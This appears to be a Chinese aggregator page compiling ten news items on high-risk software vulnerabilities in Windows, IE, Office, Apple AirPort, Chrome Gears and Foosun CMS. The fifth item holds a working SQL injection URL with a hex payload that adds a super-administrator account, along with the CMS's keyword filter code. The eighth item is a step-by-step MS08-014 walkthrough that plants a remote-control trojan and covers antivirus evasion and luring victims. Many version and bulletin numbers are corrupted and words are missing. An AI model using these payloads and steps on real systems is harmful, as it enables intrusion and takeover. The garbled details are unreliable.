图形引擎存高危漏洞

| 收藏本文 下载本文 作者:粗腿伪腹黑酱

以下是小编整理了图形引擎存高危漏洞(共含10篇),希望你喜欢,也可以帮助到您,欢迎分享!同时,但愿您也能像本文投稿人“粗腿伪腹黑酱”一样,积极向本站投稿分享好文章。

图形引擎存高危漏洞

篇1:图形引擎存高危漏洞

微软发布了本月惟一最高严重等级安全公告MS05-053,公告称其图形呈现引擎中存在漏洞,可能允许远程执行代码 ?穴896424?雪,目前受影响的操作系统包括WINDOWS以上的所有操作系统,最新的64位版本操作系统也未能幸免。

图形渲染引擎是微软视窗系统中的底层程序模块,屏幕中呈现的窗口、界面、按钮等许多都是图形渲染引擎自动生成的,

江民反病毒专家指出,电脑用户在操作过程中,屏幕中呈现的窗口、界面、按钮等许多都是图形渲染引擎自动生成的, 可以利用程序执行过程中的漏洞,欺骗用户在网站或HTML电子邮件中观看恶意图像,从而在用户毫不知觉的情况下种植木马病毒或后门程序,对染毒电脑进行远程操控。因此,对win以及winxp操作系统用户影响较大。

篇2:小心中毒微软图形呈现引擎有高危漏洞

微软发布了本月唯一最高严重等级安全公告MS05-05,公告称其图形呈现引擎中存在漏洞,可能允许远程执行代码(896)。目前受影响的操作系统包括WINDOWS000以上的所有操作系统,最新的6位版本操作系统也未能幸免。

江民反病毒专家指出,微软“图形呈现引擎”也即“图形渲染引擎”(Graphicrenderingengine),电脑用户在操作过程中,屏幕中呈现的窗口、界面、按钮等许多都是图形渲染引擎自动生成的, 可以利用程序执行过程中的漏洞,欺骗用户在网站或HTML电子邮件中观看恶意图像,从而在用户毫不知觉的情况下种植木马病毒或后门程序,对染毒电脑进行远程操控,

无独有偶,去年九月,微软曾发布过类似的安全警告MS0-08,JPEG格式图片在执行过程中也会出现类似漏洞,公告发布后不久,针对JPGE远程执行漏洞的木马病毒就出现在网上。

“很有可能针对‘图形呈现引擎’漏洞的攻击程序会很快出现”,江民反病毒专家何公道说,“目前电脑用户最要紧的是立即运行微软自动更新程序,安装补丁程序,以防范可能发生的病毒威胁。”

注:Microsoft安全公告MS05-05

图形呈现引擎中的漏洞可能允许执行代码:

www.microsoft.com/china/technet/security/bulletin/ms05-05.mx

篇3:苹果修复高危漏洞

苹果近日发布了一个安全补丁,用于修复AirPort无线网络技术的三个漏洞,这些漏洞可以用来远程执行代码,虽然苹果还没有发现关于这个漏洞的攻击。

补丁适用于OSX0..9到0..7,是为了苹果近两年来发布的操作系统设计的,包括Xserve、PowerBook、PowerMac和苹果公司所有基于Intel的系统,

因为之前的漏洞可以让供给者执行远程代码,所以SAInternetStormCenter将它定义为“高危级”。苹果建议用户尽快将系统升级到最新版本。

不过这些漏洞与拉斯维加斯那次黑帽安全会议上演示的弱点并不相关,那次研究人员利用在无线卡上的一个漏洞向计算机植入了很难被察觉的“rootkit”木马。犯罪分子可以利用这个木马从事违法活动,如记录密码和访问敏感文件等等。他们称这个漏洞不仅仅存在于苹果机上。

篇4:Windows系统再现高危漏洞

北京时间10月16日消息,据国外媒体报道,国外安全专家近日发布安全警告,Windows操作系统中发现的最新漏洞可以导致用户计算机遭到 的恶意攻击,其危害程度甚至可以达到同Zotob、震荡波或冲击波相当的水平,

通过Windows操作系统中的一个“高危”漏洞, 可以访问微软Distributed Transaction Coordinator(MSDTC),从而获得远程访问目标系统的权限。本周二,微软已经发布

了这一漏洞的相关补丁。但由于大型企业或组织升级补丁时往往行动迟缓,因此基于最新漏洞的病毒或蠕虫仍然有可能会引发新一轮的互联网危机。

赛门铁克公司安全应急中心高级主管阿尔弗莱德-哈格尔(Alfred Huger)表示,一家安全公司已经编写了利用最新Windows漏洞的代码,因此基于这一漏洞的病毒或蠕虫很快会出现,

他说:“利用这一漏洞, 可以开发出危害性极高的蠕虫,它的危害程度取决于计算机用户能否及时升级微软补丁。”

除此之外,Windows媒体播放器、Windows ActiveX以及Windows 操作系统的即插即用服务都存在着可远程利用的漏洞。这些安全漏洞影响的操作系统包括Windows NT、Windows 、Windows XP以及Windows Server 。如果用户没有及时升级微软安全补丁, 可以利用上述漏洞在目标主机上远程安装程序,修改或删除数据,或者创建具有系统权限的新帐号。

到目前为止,全球仍然有数百万台计算机采用Windows 2000操作系统,特别是在服务器中应用更为普遍。哈格尔表示:“同个人用户和中小企业相比,大型企业在升级微软安全补丁时更为谨慎,因为升级有可能对复杂的计算机系统造成损害。” Yankee集团高级分析是安德鲁-雅奎斯(Andrew Jaquith)表示, 利用最新Windows漏洞发起攻击仅仅是时间上的问题。他说:“从某种程度上讲,微软已经做得非常好,问题在于客户必须尽快升级最新安全补丁。”

篇5:风讯4高危漏洞

来源:amxkus blog

oosun cms4sp5 商业版存在严重注射漏洞

风讯4的防注射函数NoSqlHack存在致命缺陷,导致入侵者可以轻松得到webshell

Function.asp

Function NoSqlHack(FS_inputStr)

Dim f_NoSqlHack_AllStr,f_NoSqlHack_Str,f_NoSqlHack_i,Str_InputStr

Str_InputStr=FS_inputStr

f_NoSqlHack_AllStr=“*|and |exec |or |insert |select |delete |update |count |master |truncate |declare |and |exec |insert |select |delete |update |count |master |truncate |declare |char(|mid(|chr(|and[|exec[|insert[|select[|delete[|update[|count[|master[|truncate[|declare[|set[|set |set |where[|where |where |xp_cmdshell|xp_cmdshell |xp_cmdshell ”

f_NoSqlHack_Str = Split(f_NoSqlHack_AllStr,“|”)

For f_NoSqlHack_i=LBound(f_NoSqlHack_Str) To Ubound(f_NoSqlHack_Str)

If Instr(LCase(Str_InputStr),f_NoSqlHack_Str(f_NoSqlHack_i))0 Then

If f_NoSqlHack_Str(f_NoSqlHack_i)=“” Then f_NoSqlHack_Str(f_NoSqlHack_i)=“ \ ”

Response.Write “??

???????????

?????????!

??IP:”&Request.ServerVariables(“Remote_Addr”)&“

????:”&Now&“

Response.End

End if

Next

NoSqlHack = Replace(Str_InputStr,“”,“”)

End Function

关键字后面跟空格和tab是过滤的,但是跟回车时一样可以执行注射语句.过滤单引号也没有用的,我插入时用16进制编码,所以每一个点都是有问题的注射点

下面的代码可以创建一个用户名为oldjun,密码为12345678的超级管理员

demo.foosun.net/User/i_Blog/PublicLogEdit.asp?id=2;insert%0D%0A%0D%0Ainto%20FS_MF_Admin%20(Admin_Name,Admin_Pass_Word,Admin_Is_Super)values(0x6F006C0064006A0075006E00,0x3800330061006100340030003000610066003400360034006300370036006400,1)--

篇6:紧急!IE高危漏洞解决方案

12月2日微软应用系统平台又出现四个重大漏洞,其中InternetEXPlorer浏览器的“MHTML文件重定向并执行漏洞”、“非法ContentTyep缓冲目录位置泄露漏洞”、“Window.MoveBy/Method缓冲鼠标点击劫持漏洞”三个漏洞最具普遍性,大部份微软操作系统用户都在使用InternetExplore浏览器,然而微软官方暂未对这些新漏洞公布最新的补丁,如果有病毒作者利用这些漏洞,就会出现新的病毒,可能造成与“冲击波”病毒相同的危害。

为了减小危害,建议的应对措施是关闭InternetExplorer浏览器中的ACTIVE脚本。以下是关闭的方法:

1、点击InternetExplorer浏览器“工具”菜单的“选项”

2、选取“安全”标签

3、点击“默认级别”按钮,确认IE设置安全级为“中级”及以上

4、最后点击“确定”完成设置

另外,MHTML文件重定向并执行漏洞在OutlookExpress中更容易被利用,可以在不打开邮件的情况下自动下载并执行网络上的恶意程序,

建议对OutlookExpress做如下设置:

1、选取“工具”菜单中的“选项”

2、点击“安全标签”,将“选择要使用的InternetExplorer安全区域”设置为“受限站点区域(较安全)”

3、最后点击“确定”完成设置。

以上方法只是临时解决这些漏洞的危害,最根本的方法还是要微软官方公布最新的漏洞补丁。金山毒霸安全资讯网将全力关注,为您提供最新的信息和解决方法

篇7:发现微软高危漏洞 暂无补丁

该漏洞最早被发现于一个国外网站,该网站在页面中嵌入攻击代码,用于在用户的机器上安装间谍软件,NSFocus安全小组预计,可能很快会有攻击者在国内利用该漏洞来**QQ号、网络银行帐号、网络游戏帐号等。

该漏洞存在于Windows的VML组件(用于在IE中显示矢量图),目前没有任何修补补丁。漏洞的攻击代码已经被发布,而且非常容易利用。最可能的攻击行为是在网页上放置木马,一旦用户访问该网页,将自动安装 的木马或者病毒,而用户不会收到任何警告。

值得庆幸的是,所有使用Deepin XP (Windwos XP SP2完美精简版:www.deepin.org)的朋友将不会受到这个漏洞的影响:Deepin XP默认精简了VML组件,充分体现了最小化安全原则(无关的组件和服务越少,安全性越高),从而完全避免这种潜在的攻击。

但是,如果你或者你的朋友使用完整版的XP(无论正版或者盗版,都将有可能受到这个漏洞的影响),请大家相互转告并本安全紧急通告,尽量避免对自己和朋友可能的面临的危险。

简而言之,对于普通XP系统用户,单击这里看解决方法。==================================================

深度技术论坛 www.deepin.org 首发本说明

漏洞首发预警由国内领先的安全公司绿盟科技www.nsfocus.com发布

==================================================

绿盟科技紧急通告(Alert-11)

Nsfocus安全小组(security@nsfocus.com)

www.nsfocus.com

IE的VML组件存在未公开漏洞

发布日期:2006-09-20

CVE CAN ID:CVE-2006-3866

BUGTRAQ ID:6

受影响的软件及系统:

Microsoft Windows Service Pack 4

Microsoft Windows XP Service Pack 1

Microsoft Windows XP Service Pack 2

Microsoft Windows Server Service Pack 1

Microsoft Windows Server 2003 x64 Edition

Microsoft Windows XP Professional x64 Edition

综述:

NSFocus安全小组得知IE的VML组件存在一个未公开的漏洞,已经有某些网站利用这个漏洞向用户的电脑上安装间谍软件,

分析:

VML(Vector Markup Language)是一种基于XML的矢量图形绘制语言。IE通过vgx.dll提供了对VML语言的支持,可以在解析页面中嵌入的VML,显示矢量图。vgx.dll在解析VML的时候存在缓冲区溢出漏洞,利用这个漏洞可以完全控制用户的系统。

该漏洞最早被发现于一个国外网站,该网站在页面中嵌入攻击代码,用于在用户的机器上安装间谍软件。NSFocus安全小组预计,可能很快会有攻击者在国内利用该漏洞来**QQ号、网络银行帐号、网络游戏帐号等。

附加:

sunbeltblog.blogspot.com/ ... -exploit-being.html

www.microsoft.com/technet/security/advisory/925568.mspx

篇8:微软 MS08014 高危漏洞解读漏洞预警

MS08-014漏洞是微软3月份发布的一个高危漏洞,其官方描述:如果用户打开特制的Excel文件,该漏洞可能允许远程执行代码, 成功利用这些漏洞的攻击者可以完全控制受影响的系统。攻击者可随后安装程序;查看、更改或删除数据;或者创建拥有完全用户权限的新帐户。

1.受影响和不受影响的软件

受影响的软件见图1

不受影响的软件见图2

2.漏洞利用演示

最近, 发布了漏洞利用的程序。下面笔者利用该程序进行MS08-014漏洞利用演示,和大家一起亲身体验攻击者是如何利用该漏洞控制系统的。

(1).演示环境:

Windows XP SP2系统虚拟

安装Microsoft office 2003 Pack2

(2).工具:

两份正常的Excel文档:test1.xls test2.xls

漏洞利用工具:ms08_014.exe

记事本程序:notepad.exe

“远程控制任我行”服务端程序:server.exe

把以上文件、程序放到同一目录下如 D:test

(3).构造Excel文件

打开命令行(cmd.exe)工具,进入D:test目录,输入命令:

ms08_014.exe

显示该工具的使用方法:ms08_014.exe .xlsfile exefile,其中“.xlsfile”是正常的Excel文件,“exefile”是构造后的Excel文件打开后调用运行的程序。

继续输入命令:

ms08_014.exe test1.xls notepad.exe

这样test1.xls文件打开后就会运行notepad.exe即记事本,

同样输入命令:

ms08_014.exe test2.xls server.exe (图3)

这样test2.xls文件打开后就会运行server,即木马服务器。

(4).效果演示

双击打开test1.xls文件,可以看见Excel只是一闪后关闭而打开了记事本程序。(图4)

在物理主机运行“远程控制任我行”控制端,然后在虚拟机中双击打开test2.xls文件,同样Excel文件并没有打开,稍等片刻看见“任我行”控制端有主机上线了如图5,该主机正是虚拟机系统,说明server.exe运行了。(图5)

3.实战攻击:

攻击者利用MS08-014漏洞攻击的一般流程是:

(1).配置木马服务端,然后通过ms08_014.exe程序进行精心构造一个xls文件。

(2).免杀处理。由于现在杀毒软件更新很快,因此攻击者通常要对xls文件和木马服务端进行免杀处理。比如本例中攻击者通过类似“特征码定位器”这样的工具定位特征码,然后通过某些汇编工具进行相应的修改。(图6)

(3).发布病毒包,诱惑用户下载。

(4).控制服务端,进行某些非法操作。

4.预防措施:

(1).系统升级,及时打上所有的补丁。

(2).杀毒软件及时更新升级。

(3).安装防火墙。比如本例中的“远程控制任我行”服务器在运行是系统防火墙弹出了提示如图7。

(4).洁身自律,杜绝不良下载。

总结:本文的MS08-014漏洞攻击演示虽是特例,其实所有的漏洞攻击及其预防都大同小异,所以也具有普遍性。同时,本文也不是示范如何进行漏洞攻击,而是为了知己知彼,让我们在攻与防的斗争中掌握主动权,从而胜算更大一些。

篇9:补丁刚打完Office再现高危漏洞

微软今天刚发布9个重要安全漏洞补丁,可惜补的总是没有找的快,著名安全网络公司Secunia再次发出警报,Office又现高危易受攻击性漏洞,可导致整个计算机系统被 侵入控制,

补丁刚打完Office再现高危漏洞

此漏洞由HexViewSecurityResearc

篇10:Chrome更新发布 修复Gears高危漏洞

GoogleChromeBeta0.4.154.29已经于美国当地时间的12月1日发布,不过还有很多用户都不知道该版本的更新内容,实际上,本次更新主要是修复了一个由老GoogleGears引起的严重的安全问题,此漏洞允许 在在网页上运行代码,并说服用户允许Gears在第三方网站上运行,如果用户通过,那么 就得逞了。

尽管需要用户通过才可以,但此漏洞还可能被跨站调用,甚至这些网站都不需要使用Gears就可以攻击用户,

如今,154.29的Gears版本已经升级到最新的0.5.4.2(上一个版本为0.5.4.0),解决了这个问题。

Google已经为此漏洞发布了CVE(CommonVulnerabilitiesandExposures),漏洞CVE号为CVE-2008-5258,另外Google还特别感谢了IBM高级安全研究员YairAmit提交了这个高等级的漏洞。

另外,154.29版本的ChromeBeta还修复了在WindowsVista下面拖拽标签导致的程序崩溃问题。

eEye发布警告:QuickTime有新“高危”漏洞

Microsoft Windows图形设备接口库拒绝服务漏洞

人类文明的引擎教案

安存语录

存根式介绍信

发动引擎三年级作文800字

独生子女成人格障碍高危人群

udev漏洞提升

fckeditor漏洞利用

漏洞整改报告

图形引擎存高危漏洞(共10篇)

欢迎下载DOC格式的图形引擎存高危漏洞,但愿能给您带来参考作用!
推荐度: 推荐 推荐 推荐 推荐 推荐
点击下载文档 文档为doc格式
点击下载本文文档